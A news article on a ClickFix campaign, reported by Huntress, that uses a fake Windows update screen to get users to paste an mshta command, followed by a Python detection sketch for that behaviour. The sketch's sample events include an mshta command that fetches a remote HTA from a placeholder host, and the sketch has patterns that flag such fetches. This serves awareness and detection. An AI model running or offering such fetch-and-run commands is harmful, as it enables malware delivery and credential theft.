
A sneaky new strain of the ClickFix malware is making the rounds, and it’s going after the easiest victim of all: anyone who trusts a Windows update prompt. Security researchers at Huntress say the attackers have managed to put together a full-screen fake update screen that looks just convincing enough to trick people into giving it full access — all through a simple copy-paste trick.

The scam tends to show up on shady websites, mostly adult streaming pages filled with sketchy pop-ups. One misplaced click on an ad or a fake age check, and your entire browser suddenly turns into what looks like a legitimate Windows update stuck at 95%. It then claims you need to press Windows + R and paste a special command to finish the update. Of course, that’s exactly what the malware wants.

That command silently launches mshta, a built-in Windows tool, and pulls down a payload from a remote server. To make detection harder, the code includes tons of junk commands meant to throw off security software. In one of the odder twists, part of the malicious code is actually tucked inside a PNG image — the malware pulls hidden shellcode straight from the pixels and then injects itself into other running processes using .NET.

Once it’s embedded inside the system, the second stage kicks in. Known infostealers like Rhadamanthys or LummaC2 get dropped onto the machine, and from there it’s open season on passwords, browser cookies, banking logins, and crypto wallet data. Everything gets scooped up and shipped off to attackers.

Researchers say the campaign has been active since at least early October and is still very much ongoing, with multiple look-alike domains hosting the fake update screen. Forensic analysts also found random, useless strings in the code — including a weird reference to an old UN speech — apparently just thrown in to waste analysts’ time.

The worst part is that this attack relies entirely on social engineering. No file downloads. No obvious malware pop-ups. Just a website tricking you into running its command for it.
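The paste-into-Run step described above leaves a distinctive trace in endpoint telemetry: mshta.exe started by the interactive shell (explorer.exe is the parent of anything launched from the Win+R box) with a remote URL or inline script on its command line. The following detection sketch is an added example, not from Huntress or the article; the events are constructed Sysmon-style records and the domain is a placeholder.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields);
# not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://updates.example.invalid/finish.hta"},  # fake-update paste
    {"parent": r"C:\Program Files\VendorApp\app.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\VendorApp\help.hta"},    # benign local HTA
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},                                        # unrelated
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta "javascript:/*constructed*/window.close()"'},  # inline-script variant
]

REMOTE_RE = re.compile(r"\b(?:https?|ftp)://|\\\\[^\\\s]+\\", re.I)  # URL or UNC path
INLINE_RE = re.compile(r"\b(?:javascript|vbscript)\s*:", re.I)       # script in the argument

def mshta_reasons(event):
    """Return the reasons an event matches the ClickFix pattern ([] = no match)."""
    if not event["image"].lower().endswith("\\mshta.exe"):
        return []
    shell_parent = event["parent"].lower().endswith("\\explorer.exe")
    payload = []
    if REMOTE_RE.search(event["cmdline"]):
        payload.append("fetches its HTA from a remote URL or UNC path")
    if INLINE_RE.search(event["cmdline"]):
        payload.append("runs inline script instead of a local file")
    # Require both the interactive shell as parent AND a payload indicator,
    # so a vendor application opening its own local .hta does not fire.
    if shell_parent and payload:
        return ["started by explorer.exe (the parent of a Win+R paste)"] + payload
    return []

def scan(events):
    """Return {event index: reasons} for every event that matches."""
    return {i: r for i, e in enumerate(events) if (r := mshta_reasons(e))}

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmdline']}")
        for reason in reasons:
            print("   -", reason)
```

On real hosts the same logic applies to Sysmon or EDR process-creation events; the HKCU RunMRU key also records what a user typed into the Run box and is worth pulling during triage.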

The quick takeaway:

Never copy and paste commands from a random webpage, no matter how official it looks. Real Windows updates don’t ask you to open the Run box — ever.
